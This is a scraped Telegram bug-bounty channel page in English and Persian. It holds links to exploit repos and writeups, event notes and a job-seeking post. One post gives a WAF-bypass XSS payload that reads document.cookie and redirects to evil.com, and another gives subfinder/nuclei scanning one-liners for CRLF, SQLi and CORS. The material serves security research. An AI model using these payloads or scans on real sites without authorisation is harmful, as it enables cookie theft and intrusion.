en
Feedback
Bugbounty Tips

Bugbounty Tips

Open in Telegram

research and sharing in cybersecurity

Show more
2 905
Subscribers
No data24 hours
-67 days
-1930 days
Posts Archive
CyberPanel-RCE https://github.com/DreyAnd/CyberPanel-RCE For more join to channel (: https://t.me/rootdr_research #exploit #B
CyberPanel-RCE https://github.com/DreyAnd/CyberPanel-RCE For more join to channel (: https://t.me/rootdr_research #exploit #Bugbounty

tech olympics 2024 For more join to channel (: https://t.me/rootdr_research

For more join to channel (: https://t.me/rootdr_research
For more join to channel (: https://t.me/rootdr_research

🐞 Party🥳🥳 به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️ For more join to channel (: https://t.me/rootdr_research

🐞 Party🥳🥳 از همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️ For more join to channel (: https://t.me/rootdr_research

Logger++ Custom Filters A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters For more join to channel (: https://t.me/rootdr_research #LINK #bugbounty

یکم تا سوم ایونت باگ پارتی راورو اگه بودید میبینمتون❤️

سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود (https://hackerone.com/opensea?type=team) با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه تایتل آسیب پذیری: Email Verification Bypass For more join to channel (: https://t.me/rootdr_research #Video #Writeup

Sucuri WAF Bypass: payload: ClickMe ClickMe For more join to channel (: https://t.me/rootdr_research #LINK #WEB
Sucuri WAF Bypass: payload:
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>
For more join to channel (: https://t.me/rootdr_research #LINK #WEB

دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصو
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..

سلام دوستان یکسری از بچه ها بابت کلاس و تدریس از من پرسیدن من دوره برگذار نمیکنم درگیرم وقتشو ندارم ولی اگه کسی خواست یه گفت و گو و مشورتی داشته باشه میتونم در حد یکی دو جلسه باهاش میتینگ آنلاین داشته باشم برای رفع اشکال و دید دادن توی پروسه باگ بانتی اگر کسی خواست بهم پیم بده باهاش صحبت کنم ظرفیت زیادی هم از نظر زمانی ندارم شاید بتونم دو الی سه نفر پر کنم که یکیش رزرو شده اگر خواستین بهم پیم بدین @RootDr

https://github.com/coffinxp/nuclei-templates how to use in bug bounty programs: subfinder -d xyz.com -all  | nuclei -t crlf.yaml -rl 50 subfinder -d xyz.com -all  | nuclei -t openRedirect.yaml -rl 100 subfinder -d xyz.com -all  | nuclei -t iis.yaml subfinder -d xyz.com -all  | nuclei -t cors.yaml -rl 100 subfinder -d xyz.com -all  | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50 For more join to channel (: https://t.me/rootdr_research #LINK #WEB

با سلام دوستان من open to work هستم، موقعیت شغلی مناسبی داشتید در یزد به صورت حضوری و ریموت در هر شهری در خدمتتون هستم‌. T.me//RootDr اشتراک گذاریش خالی از لطف نیست متشکرم ازتون پیشاپیش🙏❤️

MohammadJavadBanaroeResume (2).pdf1.26 KB

یک چنل با محتوای بدرد بخور: https://t.me/bugbounty_poc ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه. For more join to channel (: https://t.me/rootdr_research #LINK #WEB

photo content

یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید. Recon Vulnerability Detection Github Detective URL Crawler همراه با خروجی مناسب پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیاز‌ها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند. https://hackerium.io For more join to channel (: https://t.me/rootdr_research #bugbounty #web #Pentest

بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه پ.ن: ASIS خشن مینوازد😂😂

Writeups_OlympicsPwners.pdf1.87 MB